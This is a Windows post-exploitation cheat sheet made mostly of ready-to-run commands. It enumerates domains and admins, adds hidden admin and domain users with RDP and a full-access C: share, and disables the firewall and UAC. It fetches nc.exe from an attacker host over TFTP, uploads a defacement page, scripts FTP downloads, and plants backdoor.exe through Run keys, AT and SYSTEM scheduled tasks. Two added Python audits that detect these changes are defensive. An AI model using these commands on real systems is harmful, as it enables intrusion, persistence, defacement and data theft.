A list of useful command-line syntax that can be used on servers to find various important information.
--------------------------
View Computers, Workgroups & Domains:
--------------------------
NET VIEW
NET VIEW /DOMAIN
List Domain Controllers:
Win2K:
NETDOM QUERY /D:MyDomain DC
Find Primary DC:
NETDOM QUERY /D:MyDomain PDC
Win2k3:
DSQUERY Server
Find primary DC:
NETDOM QUERY /D:mydomain.com FSMO
----------------------
Check users logged on:
----------------------
NET SESSION | FIND "\\"
WMIC /Node:remotecomputer ComputerSystem Get UserName
Using REG.EXE (each FOR loop is a single line; ^| escapes the pipe inside the FOR /F command, and %%A/%%B become %A/%B when typed directly at the prompt instead of in a batch file):
Windows 2000 | XP | 2003:
FOR /F %%A IN ('REG Query \\remotecomputer\HKU ^| FINDSTR /R /B /C:"HKEY_USERS\\S-1-5-[0-9][0-9]-[0-9-]*$"') DO (FOR /F "tokens=3 delims=\" %%B IN ('REG Query "\\remotecomputer\%%A\Volatile Environment"') DO (SET LoggedinUser=%%B))
Windows 7:
FOR /F %%A IN ('REG Query \\remotecomputer\HKU /K /F "S-1-5-21-" ^| FINDSTR /R /B /C:"HKEY_USERS\\S-1-5-[0-9][0-9]-[0-9-]*$"') DO (FOR /F "tokens=2*" %%B IN ('REG Query "\\remotecomputer\%%~A\Volatile Environment" /V "UserName" ^| FIND /V ":"') DO (SET LoggedinUser=%%C))
----------
SYSTEMINFO:
----------
systeminfo
net config workstation
tasklist
taskkill [/f] /pid <pid>
taskkill [/f] /im <image_name>
qprocess
--------------
schedule tasks:
--------------
echo %time%
at
at <time+1min> /INTERACTIVE "cmd.exe"
Pops a SYSTEM-level interactive shell if the AT service is not disabled; scheduled tasks (schtasks) can also be used...
schtasks
----------
LIST USERS:
----------
whoami /all
net use
net localgroup
net localgroup <GROUP-NAME>
NET LOCALGROUP Administrators
net localgroup administrators /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Controllers" /domain
net localgroup "Remote Desktop Users"    (a built-in local group, so net localgroup rather than net group)
password policy info:
net accounts
net accounts /domain
----------------------------------
Find out Group Membership for user:
----------------------------------
DSQUERY USER -samid <loginname> | DSGET USER -memberof -expand
------------------------------------
Check Directory Permissions for User:
------------------------------------
CD /D d:\directory2check
SHOWACLS /U:domain\userid    (SHOWACLS is a Resource Kit tool)
------------
List Drives:
------------
fsutil fsinfo drives
------------
List Shares:
------------
net share
---------------
Reset User Pass:
---------------
NET USER <loginname> <newpassword> /DOMAIN
on Srv2k3:
DSQUERY USER -samid <loginname> | DSMOD USER -pwd <newpassword>
Now make sure password never expires:
WMIC.EXE /Node:remotecomputer Path Win32_UserAccount Where Name="user" Set PasswordExpires="FALSE"
-------------------------
ADD USER + RDP ENABLEMENT:
-------------------------
net user <USER-NAME> <PASS> /add
net localgroup administrators <USER-NAME> /add
net localgroup "Remote Desktop Users" <USER-NAME> /add
net share nothing$=C:\ /grant:<USER-NAME>,FULL /unlimited
Shares the C: drive (as the hidden share nothing$) and grants full, unlimited access to it for our new admin user....
***If the server is a member of a domain, we can go a step further and add a domain-level user rather than a local one. This will have more reach within the organisation than a local user will, but it will also be much more visible to the IT team of the organisation that you're testing. Simply add "/DOMAIN" after the first command above to add the user at domain level in addition to local level.
Re-enable a disabled account (perhaps an old admin account):
net user username /active:yes /domain
-------------------------------------------------------------------------------
Tunnel RDP out on another port besides default port 3389, port 443 in this case:
-------------------------------------------------------------------------------
REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f
Simply change it back to 3389 to return to the default port. If you need to check whether a port is already in use, run a quick netstat -an | find ":<port#>" (FIND needs the search string in quotes).
**May need a restart or an RDP service restart to take effect.
--------------
Firewall Info:
--------------
If you want to find out general info about the firewall, use this:
netsh firewall show opmode
See list of port openings:
netsh firewall show portopening
Add port opening in firewall, for port 455 for any service or program to use:
netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
Turn off built-in Windows firewall:
netsh firewall set opmode disable
or
SC [ \\Remote_computer ] Stop SharedAccess
SC [ \\Remote_computer ] Config SharedAccess start= disabled
---------------------
NetCat File Transfers:
---------------------
Push a file from client to listener:
$ ncat -lv [LocalPort] > [outfile]
Listen on [LocalPort], store results in [outfile]
$ nc -w3 [TargetIPaddr] [port] < [infile]
Push [infile] to [TargetIPaddr] on [port]
Pull file from listener back to client:
$ nc -l -p [LocalPort] < [infile]
Listen on [LocalPort], prep to push [infile]
$ nc -w3 [TargetIPaddr] [port] > [outfile]
Connect to [TargetIPaddr] on [port] and retrieve [outfile]
--------------------
TFTP File Transfers:
--------------------
If the TFTP server is not enabled, follow these 4 quick steps:
1 => copy %windir%\system32\dllcache\tftpd.exe %windir%\system32
2 => sc create tftpdsvc binPath= C:\Windows\System32\tftpd.exe DisplayName= "TFTP Server" start= auto
Should see: "[SC] CreateService SUCCESS"
3 => REG ADD HKLM\SYSTEM\CurrentControlSet\Services\tftpdsvc\Parameters /v Directory /t REG_SZ /d "C:\Documents and Settings\Administrator\Desktop\tftp"
4 => net start tftpdsvc
tftp [-i] [Host] [{get | put}] [Source] [Destination]
-i: Specifies binary image transfer mode (also called octet mode). In binary image mode, the file is transferred in one-byte units; use this mode when transferring binary files. If -i is omitted, the file is transferred in ASCII mode, the default, which converts the end-of-line (EOL) characters to the appropriate format for the specified computer; use this mode when transferring text files. If a file transfer is successful, the data transfer rate is displayed.
Host: Specifies the local or remote computer.
put: Transfers the file Source on the local computer to the file Destination on the remote computer. Because the TFTP protocol does not support user authentication, the user must be logged onto the remote computer, and the files must be writable on the remote computer.
get: Transfers the file Source on the remote computer to the file Destination on the local computer.
Source: Specifies the file to transfer.
Destination: Specifies where to transfer the file. If Destination is omitted, it is assumed to have the same name as Source.
/?: Displays help at the command prompt.
EXAMPLES (ATTACKER=.21 && TARGET=.30):
tftp 192.168.1.30 PUT /home/hood3drob1n/defaced.html index.html
This will transfer the local file "defaced.html" from local to remote server and will re-name the file as index.html on the remote server, which was identified as 192.168.1.30
tftp -i 192.168.1.21 GET /home/hood3drob1n/evil/nc.exe
This will grab a copy of nc.exe from 192.168.1.21
tftp -i 192.168.1.30 PUT /home/hood3drob1n/evil/nc.exe /path/on/target/nc.exe
This will copy local file nc.exe to the server at 192.168.1.30
If facing newer Windows systems (Vista, 7, or Srv2008) you might need to disable CTCP (Compound TCP) to get TFTP working, as CTCP has been known to cause timeout issues (it is not implemented in Linux or Windows XP).
To disable it, enter this command: netsh interface tcp set global congestionprovider=none
TFTP client not present because it is a newer system (an optional feature from Vista onward)? No problem, re-enable it using DISM.
DISM (Deployment Image Servicing and Management) allows command-line control of Windows features; I do it via a DOS script, but this is the key:
dism /online /Enable-Feature /FeatureName:TelnetClient
dism /online /Enable-Feature /FeatureName:TFTP
-----------------------
CMD FTP Remote Download:
-----------------------
echo open <site.com> > ftpscript.txt    (optional; if omitted, give the host/IP after the script name so ftp knows the target: ftp -s:ftpscript.txt <site.com>)
echo <USER> >> ftpscript.txt
echo <PASS> >> ftpscript.txt
echo binary >> ftpscript.txt    (needed if the file fetched on the next line is binary, e.g. a .exe; otherwise not needed)
echo get <FILE> >> ftpscript.txt
echo quit >> ftpscript.txt
ftp -s:ftpscript.txt
----------------------------
Set Backdoor w/Firewall hole:
----------------------------
1)
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\backdoor.exe" /f
2)
at 19:00 /every:M,T,W,Th,F cmd /c start "" "%USERPROFILE%\backdoor.exe"    (the empty "" is the window title; without it START treats the first quoted argument as the title and runs nothing)
3)
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\backdoor.exe" /ED 12/12/2012
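Added here as a defender's counterpart to the three persistence steps above (not part of the original cheat sheet): a Python audit over the CSV that schtasks /query /fo CSV /v prints, flagging tasks that run a binary from a user-writable path under a privileged account and jobs created with AT. The sample rows are constructed and trimmed to the columns used; the user-writable path heuristic and the \At<n> naming check are assumptions of this example.

```python
import csv
import io
import re

USER_PATH = re.compile(r"%userprofile%|%temp%|%appdata%|\\users\\|documents and settings", re.I)
SYSTEM_ACCOUNTS = {"system", "nt authority\\system", "local service", "network service"}

def parse_schtasks_csv(text):
    """Rows of 'schtasks /query /fo CSV /v' output; /v repeats the header, so drop those rows."""
    return [row for row in csv.DictReader(io.StringIO(text)) if row.get("TaskName") != "TaskName"]

def audit_tasks(rows):
    """Flag tasks matching the persistence pattern above: privileged account, user-writable binary."""
    findings = []
    for row in rows:
        name, cmd, user = row["TaskName"], row["Task To Run"], row["Run As User"].strip()
        if user.lower() in SYSTEM_ACCOUNTS and USER_PATH.search(cmd):
            findings.append(f"{name}: runs {cmd} as {user} from a user-writable path")
        if re.fullmatch(r"\\At\d+", name):
            findings.append(f"{name}: legacy AT job ({cmd})")  # AT-created jobs are named \At1, \At2, ...
    return findings

# Constructed sample trimmed to the columns used; real output has many more columns
SAMPLE = r'''"HostName","TaskName","Task To Run","Run As User"
"SRV01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c","SYSTEM"
"SRV01","\FIREWALL","%USERPROFILE%\backdoor.exe","SYSTEM"
"SRV01","\At1","cmd /c start """" ""%USERPROFILE%\backdoor.exe""","SYSTEM"
"SRV01","\OneDrive Update","C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe","SRV01\alice"
'''
```

The same audit runs unchanged on a file saved with schtasks /query /fo CSV /v > tasks.csv; the OneDrive row shows that a user-profile path alone, without a privileged account, is not flagged.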
--------------
Services Info:
--------------
To delete a Windows service, use the Service Control command, "sc", with the delete argument followed by the service name:
sc delete <ServiceName>
Use quotes if spaces in name:
sc delete "Apple Mobile Device"
You can use SC to query all configured services on the box with a simple command:
sc query
or
NET START
All services on Windows can be found under this registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
Start/Pause/Stop/Continue a Service
SC <ServerName> Start|Pause|Stop|Continue <ServiceName>
If you omit the server name, localhost is assumed; you can also leverage this to interact with other systems' services if you have elevated privileges on them:
SC Stop Scheduler
SC Start Messenger
SC \\W2k3SRV Pause W3Svc
SC \\192.168.1.10 Continue NTfrs
----------------------
Disable UAC in Vista+:
----------------------
%windir%\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Essentially we just set this registry value:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
EnableLUA=0 to disable and EnableLUA=1 to re-enable UAC
-----------------
REGISTRY EDITING:
-----------------
--------------------------------------------
Query for a specific Value of a Registry Key:
--------------------------------------------
reg {QUERY | ADD | DELETE | COPY | SAVE | LOAD | UNLOAD | RESTORE | COMPARE | EXPORT | IMPORT} KEY [flags]
reg <option> [\\TargetIPaddr\][RegDomain]\[Key] /v [ValueName]
Check if RDP is enabled or not (fDenyTSConnections is a value under the Terminal Server key, so query it with /v rather than as part of the key path):
C:\> reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
0 = RDP enabled (connections allowed)
1 = RDP disabled (connections denied)
To re-enable RDP:
REG.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
If remote registry access is available, you can try tweaking internal machines as well to further pivot:
REG.exe ADD "\\MachineName\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
The machine typically needs to be rebooted for the change to take effect, so open a command prompt and type the following command:
shutdown -m \\srv220 -r
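As an added example (not from the original page), the defender's view of the registry changes described in this section and earlier ones (fDenyTSConnections, the RDP-Tcp PortNumber moved to 443, EnableLUA=0, and the Run key used for the backdoor): a Python parser for saved 'reg query' output and an audit function that flags them. The sample output is constructed; the user-writable path heuristic for Run entries is an assumption of this example.

```python
import re
# 'reg query' value line: name, type, data separated by runs of spaces
_VALUE_RE = re.compile(r"^\s{2,}(\S.*?)\s{2,}(REG_\w+)(?:\s{2,}(.*))?$")
_KEY_RE = re.compile(r"^HK[A-Z_]+\\")
TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
UAC_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
USER_WRITABLE = re.compile(r"%userprofile%|%temp%|%appdata%|\\users\\|documents and settings", re.I)

def parse_reg_query(text):
    """Return {(key_path, value_name): (type, data)}; keys and names are lower-cased."""
    values, key = {}, None
    for line in text.splitlines():
        if _KEY_RE.match(line):
            key = line.strip().lower()
        elif key and (m := _VALUE_RE.match(line)):
            values[(key, m.group(1).lower())] = (m.group(2), (m.group(3) or "").strip())
    return values

def dword(values, key, name):
    """Integer value of a REG_DWORD (reg query prints it as hex, e.g. 0x1bb), else None."""
    entry = values.get((key.lower(), name.lower()))
    return int(entry[1], 16) if entry and entry[0] == "REG_DWORD" else None

def audit(values):
    """Flag RDP exposure, UAC weakening and Run entries launched from user-writable paths (assumed heuristic)."""
    findings = []
    if dword(values, TS_KEY, "fDenyTSConnections") == 0:
        findings.append("RDP enabled: fDenyTSConnections=0")
    port = dword(values, TS_KEY + r"\WinStations\RDP-Tcp", "PortNumber")
    if port is not None and port != 3389:
        findings.append(f"RDP moved to non-default port {port}")
    if dword(values, UAC_KEY, "EnableLUA") == 0:
        findings.append("UAC disabled: EnableLUA=0")
    for (key, name), (_, data) in values.items():
        if key.endswith(r"\currentversion\run") and USER_WRITABLE.search(data):
            findings.append(f"Run entry {name!r} starts from a user-writable path: {data}")
    return findings

# Constructed sample of what 'reg query' prints for these keys on a weakened host
SAMPLE = r"""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    PortNumber    REG_DWORD    0x1bb
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    firewall    REG_SZ    %USERPROFILE%\backdoor.exe
"""
```

Feed it the concatenated output of the reg query commands from this page (e.g. reg query "<key>" /v <value> > regs.txt) and call audit(parse_reg_query(open("regs.txt").read())).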
----------------------
Interface Device Info:
----------------------
ipconfig /all
ipconfig /displaydns
arp -a
route print
type %WINDIR%\System32\drivers\etc\hosts
------------------
Group Policy Info:
------------------
gpresult /z